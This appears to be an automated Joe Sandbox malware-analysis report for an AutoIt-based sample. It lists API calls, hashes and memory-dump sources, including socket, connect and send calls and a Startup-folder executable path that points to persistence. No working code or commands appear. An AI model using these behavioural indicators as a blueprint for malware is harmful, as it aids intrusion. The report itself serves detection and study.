                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: QueryValue$Open
                                                                                                                                                                  • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                                                                                                  • API String ID: 1606891134-614718249
                                                                                                                                                                  • Opcode ID: eaeed8ebcfdd11a866fcb58b8ef4c9fe704959e96fca42963bb72556bdd2136b
                                                                                                                                                                  • Instruction ID: 066435271b77ba1d440993a3e5b63f522cc428a14a41583346d6cdb87b717eb3
                                                                                                                                                                  • Opcode Fuzzy Hash: eaeed8ebcfdd11a866fcb58b8ef4c9fe704959e96fca42963bb72556bdd2136b
                                                                                                                                                                  • Instruction Fuzzy Hash: D4113D71A1111CBEEB04ABA4DD86EBE77BCEF04358F104059F506E6091EAB0AE55DB50
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryA.KERNEL32(?), ref: 003431EA
                                                                                                                                                                  • 6C1F6DE0.KERNEL32(?,0033CFF9), ref: 00343208
                                                                                                                                                                  • ExitProcess.KERNEL32(?,0033CFF9), ref: 00343219
                                                                                                                                                                  • VirtualProtect.KERNEL32(001E0000,00001000,00000004,?,00000000), ref: 00343267
                                                                                                                                                                  • VirtualProtect.KERNEL32(001E0000,00001000), ref: 0034327C
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ProtectVirtual$ExitLibraryLoadProcess
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3729624760-0
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001E3B1E: _wcsncpy.LIBCMT ref: 001E3B32
                                                                                                                                                                  • GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00226DBA
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00226DC5
                                                                                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00226DD9
                                                                                                                                                                  • _wcsrchr.LIBCMT ref: 00226DFB
                                                                                                                                                                    • Part of subcall function 00226D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00226E31
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3633006590-0
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0023ACD3: inet_addr.WS2_32(00000000), ref: 0023ACF5
                                                                                                                                                                  • socket.WS2_32(00000002,00000001,00000006,?,?,00000000), ref: 00239160
                                                                                                                                                                  • WSAGetLastError.WS2_32(00000000), ref: 0023916F
                                                                                                                                                                  • connect.WS2_32(00000000,?,00000010), ref: 0023918B
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastconnectinet_addrsocket
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3701255441-0
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: dE)
                                                                                                                                                                  • API String ID: 0-2133039554
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001E3F9B: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,001E34E2,?,00000001), ref: 001E3FCD
                                                                                                                                                                  • _free.LIBCMT ref: 00253C27
                                                                                                                                                                  • _free.LIBCMT ref: 00253C6E
                                                                                                                                                                    • Part of subcall function 001EBDF0: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,002A22E8,?,00000000,?,001E3E2E,?,00000000,?,0027DBF0,00000000,?), ref: 001EBE8B
                                                                                                                                                                    • Part of subcall function 001EBDF0: GetFullPathNameW.KERNEL32(?,00000104,?,?,?,001E3E2E,?,00000000,?,0027DBF0,00000000,?,00000002), ref: 001EBEA7
                                                                                                                                                                    • Part of subcall function 001EBDF0: __wsplitpath.LIBCMT ref: 001EBF19
                                                                                                                                                                    • Part of subcall function 001EBDF0: _wcscpy.LIBCMT ref: 001EBF31
                                                                                                                                                                    • Part of subcall function 001EBDF0: _wcscat.LIBCMT ref: 001EBF46
                                                                                                                                                                    • Part of subcall function 001EBDF0: SetCurrentDirectoryW.KERNEL32(?), ref: 001EBF56
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CurrentDirectory_free$FullLibraryLoadNamePath__wsplitpath_wcscat_wcscpy
                                                                                                                                                                  • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                                                                                                  • API String ID: 1510338132-1757145024
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,001FC948,SwapMouseButtons,00000004,?), ref: 001FC979
                                                                                                                                                                  • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,001FC948,SwapMouseButtons,00000004,?,?,?,?,001FBF22), ref: 001FC99A
                                                                                                                                                                  • RegCloseKey.KERNEL32(00000000,?,?,001FC948,SwapMouseButtons,00000004,?,?,?,?,001FBF22), ref: 001FC9BC
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                                                                  • String ID: Control Panel\Mouse
                                                                                                                                                                  • API String ID: 3677997916-824357125
Memory Dump Source
• Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
• Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001E16F2: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 001E1751
                                                                                                                                                                  • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 001E159B
                                                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 001E1612
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 002558F7
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Handle$ClipboardCloseFormatInitializeRegister
                                                                                                                                                                  • String ID: '/"
                                                                                                                                                                  • API String ID: 458326420-88076542
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001E41A7: _fseek.LIBCMT ref: 001E41BF
                                                                                                                                                                    • Part of subcall function 0022CE59: _wcscmp.LIBCMT ref: 0022CF49
                                                                                                                                                                    • Part of subcall function 0022CE59: _wcscmp.LIBCMT ref: 0022CF5C
                                                                                                                                                                  • _free.LIBCMT ref: 0022CDC9
                                                                                                                                                                  • _free.LIBCMT ref: 0022CDD0
                                                                                                                                                                  • _free.LIBCMT ref: 0022CE3B
                                                                                                                                                                    • Part of subcall function 002028CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00208715,00000000,002088A3,00204673,?), ref: 002028DE
                                                                                                                                                                    • Part of subcall function 002028CA: GetLastError.KERNEL32(00000000,?,00208715,00000000,002088A3,00204673,?), ref: 002028F0
                                                                                                                                                                  • _free.LIBCMT ref: 0022CE43
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1552873950-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 001E1E87
                                                                                                                                                                    • Part of subcall function 001E38E4: _memset.LIBCMT ref: 001E3965
                                                                                                                                                                    • Part of subcall function 001E38E4: _wcscpy.LIBCMT ref: 001E39B5
                                                                                                                                                                    • Part of subcall function 001E38E4: Shell_NotifyIconW.SHELL32(00000001,?), ref: 001E39C6
                                                                                                                                                                  • KillTimer.USER32(?,00000001), ref: 001E1EDC
                                                                                                                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 001E1EEB
                                                                                                                                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00254526
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1378193009-0
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001FF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0022AEA5,?,?,00000000,00000008), ref: 001FF282
                                                                                                                                                                    • Part of subcall function 001FF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0022AEA5,?,?,00000000,00000008), ref: 001FF2A6
                                                                                                                                                                  • gethostbyname.WS2_32(?), ref: 002392F0
                                                                                                                                                                  • WSAGetLastError.WS2_32(00000000), ref: 002392FB
                                                                                                                                                                  • _memmove.LIBCMT ref: 00239328
                                                                                                                                                                  • inet_ntoa.WS2_32(?), ref: 00239333
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1504782959-0
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 002045EC: __FF_MSGBANNER.LIBCMT ref: 00204603
                                                                                                                                                                    • Part of subcall function 002045EC: __NMSG_WRITE.LIBCMT ref: 0020460A
                                                                                                                                                                    • Part of subcall function 002045EC: RtlAllocateHeap.NTDLL(00D80000,00000000,00000001), ref: 0020462F
                                                                                                                                                                  • std::exception::exception.LIBCMT ref: 0020013E
                                                                                                                                                                  • __CxxThrowException@8.LIBCMT ref: 00200153
                                                                                                                                                                    • Part of subcall function 00207495: RaiseException.KERNEL32(?,?,001E125D,00296598,?,?,?,00200158,001E125D,00296598,?,00000001), ref: 002074E6
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                                                                  • String ID: bad allocation
                                                                                                                                                                  • API String ID: 3902256705-2104205924
                                                                                                                                                                  APIs
                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,001EC00E,?,?,?,?,00000010), ref: 001EC627
                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,00000010), ref: 001EC65F
                                                                                                                                                                  • _memmove.LIBCMT ref: 001EC697
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharMultiWide$_memmove
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3033907384-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • SHGetMalloc.SHELL32(001E3C31), ref: 001E3A7D
                                                                                                                                                                  • SHGetPathFromIDListW.SHELL32(?,?), ref: 001E3AD2
                                                                                                                                                                  • SHGetDesktopFolder.SHELL32(?), ref: 001E3A8F
                                                                                                                                                                    • Part of subcall function 001E3B1E: _wcsncpy.LIBCMT ref: 001E3B32
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DesktopFolderFromListMallocPath_wcsncpy
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3981382179-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • __FF_MSGBANNER.LIBCMT ref: 00204603
                                                                                                                                                                    • Part of subcall function 00208E52: __NMSG_WRITE.LIBCMT ref: 00208E79
                                                                                                                                                                    • Part of subcall function 00208E52: __NMSG_WRITE.LIBCMT ref: 00208E83
                                                                                                                                                                  • __NMSG_WRITE.LIBCMT ref: 0020460A
                                                                                                                                                                    • Part of subcall function 00208EB2: GetModuleFileNameW.KERNEL32(00000000,002A0312,00000104,?,00000001,00200127), ref: 00208F44
                                                                                                                                                                    • Part of subcall function 00208EB2: ___crtMessageBoxW.LIBCMT ref: 00208FF2
                                                                                                                                                                    • Part of subcall function 00201D65: ___crtCorExitProcess.LIBCMT ref: 00201D6B
                                                                                                                                                                    • Part of subcall function 00201D65: ExitProcess.KERNEL32 ref: 00201D74
                                                                                                                                                                    • Part of subcall function 0020889E: __getptd_noexit.LIBCMT ref: 0020889E
                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00D80000,00000000,00000001), ref: 0020462F
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1372826849-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • TranslateMessage.USER32(?), ref: 001EE646
                                                                                                                                                                  • DispatchMessageW.USER32(?), ref: 001EE651
                                                                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001EE664
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Message$DispatchPeekTranslate
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4217535847-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • _free.LIBCMT ref: 0022C45E
                                                                                                                                                                    • Part of subcall function 002028CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00208715,00000000,002088A3,00204673,?), ref: 002028DE
                                                                                                                                                                    • Part of subcall function 002028CA: GetLastError.KERNEL32(00000000,?,00208715,00000000,002088A3,00204673,?), ref: 002028F0
                                                                                                                                                                  • _free.LIBCMT ref: 0022C46F
                                                                                                                                                                  • _free.LIBCMT ref: 0022C481
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: CALL
                                                                                                                                                                  • API String ID: 0-4196123274
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memmove
                                                                                                                                                                  • String ID: EA06
                                                                                                                                                                  • API String ID: 4104443479-3962188686
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _wcscmp
                                                                                                                                                                  • String ID: 0.0.0.0
                                                                                                                                                                  • API String ID: 856254489-3771769585
                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 00253CF1
                                                                                                                                                                    • Part of subcall function 001E31B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 001E31DA
                                                                                                                                                                    • Part of subcall function 001E3A67: SHGetMalloc.SHELL32(001E3C31), ref: 001E3A7D
                                                                                                                                                                    • Part of subcall function 001E3A67: SHGetDesktopFolder.SHELL32(?), ref: 001E3A8F
                                                                                                                                                                    • Part of subcall function 001E3A67: SHGetPathFromIDListW.SHELL32(?,?), ref: 001E3AD2
                                                                                                                                                                    • Part of subcall function 001E3B45: GetFullPathNameW.KERNEL32(?,00000104,?,?,002A22E8,?), ref: 001E3B65
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Path$FullName$DesktopFolderFromListMalloc_memset
                                                                                                                                                                  • String ID: X
                                                                                                                                                                  • API String ID: 2727075218-3081909835
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memmove
                                                                                                                                                                  • String ID: "*
                                                                                                                                                                  • API String ID: 4104443479-2553813866
                                                                                                                                                                  Strings
                                                                                                                                                                  • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 002534AA
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                  • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                                                                                                                                                  • API String ID: 1029625771-2684727018
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00226623: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000001,00000003,?,0022685E,?,?,?,00254A5C,0027E448,00000003,?,?), ref: 002266E2
                                                                                                                                                                  • WriteFile.KERNEL32(?,?,"*,00000000,00000000,?,?,?,00254A5C,0027E448,00000003,?,?,001E4C44,?,?), ref: 0022686C
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
• Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$PointerWrite
                                                                                                                                                                  • String ID: "*
                                                                                                                                                                  • API String ID: 539440098-2553813866
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCursorPos.USER32(?), ref: 00238074
                                                                                                                                                                  • GetForegroundWindow.USER32 ref: 0023807A
                                                                                                                                                                    • Part of subcall function 00236B19: GetWindowRect.USER32(?,?), ref: 00236B2C
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$CursorForegroundRect
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1066937146-0
                                                                                                                                                                  APIs
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memmove
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4104443479-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • IsWindow.USER32(00000000), ref: 0025DB31
                                                                                                                                                                  • IsWindow.USER32(00000000), ref: 0025DB6B
                                                                                                                                                                    • Part of subcall function 001E1F04: GetForegroundWindow.USER32 ref: 001E1FBE
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$Foreground
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 62970417-0
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001E193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 001E1952
                                                                                                                                                                  • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0021E344
                                                                                                                                                                  • _strlen.LIBCMT ref: 0021E34F
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$Timeout_strlen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2777139624-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • 745EC8D0.UXTHEME ref: 001E36E6
                                                                                                                                                                    • Part of subcall function 00202025: __lock.LIBCMT ref: 0020202B
                                                                                                                                                                    • Part of subcall function 001E32DE: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 001E32F6
                                                                                                                                                                    • Part of subcall function 001E32DE: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 001E330B
                                                                                                                                                                    • Part of subcall function 001E374E: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 001E376D
                                                                                                                                                                    • Part of subcall function 001E374E: IsDebuggerPresent.KERNEL32(?,?), ref: 001E377F
                                                                                                                                                                    • Part of subcall function 001E374E: GetFullPathNameW.KERNEL32(C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe,00000104,?,002A1120,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe,002A1124,?,?), ref: 001E37EE
                                                                                                                                                                    • Part of subcall function 001E374E: SetCurrentDirectoryW.KERNEL32(?), ref: 001E3860
                                                                                                                                                                  • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 001E3726
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InfoParametersSystem$CurrentDirectory$DebuggerFullNamePathPresent__lock
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3809921791-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000001,?,001E4C2B,?,?,?,?,001EBE63), ref: 001E4BB6
                                                                                                                                                                  • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000001,?,001E4C2B,?,?,?,?,001EBE63), ref: 00254972
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0022AEA5,?,?,00000000,00000008), ref: 001FF282
                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0022AEA5,?,?,00000000,00000008), ref: 001FF2A6
                                                                                                                                                                    • Part of subcall function 001FF2D0: _memmove.LIBCMT ref: 001FF307
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharMultiWide$_memmove
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3033907384-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • ___lock_fhandle.LIBCMT ref: 0020F7D9
                                                                                                                                                                  • __close_nolock.LIBCMT ref: 0020F7F2
                                                                                                                                                                    • Part of subcall function 0020886A: __getptd_noexit.LIBCMT ref: 0020886A
                                                                                                                                                                    • Part of subcall function 0020889E: __getptd_noexit.LIBCMT ref: 0020889E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1046115767-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • send.WS2_32(00000000,?,00000000,00000000), ref: 00239534
                                                                                                                                                                  • WSAGetLastError.WS2_32(00000000,?,00000000,00000000), ref: 00239557
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastsend
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1802528911-0
                                                                                                                                                                  APIs
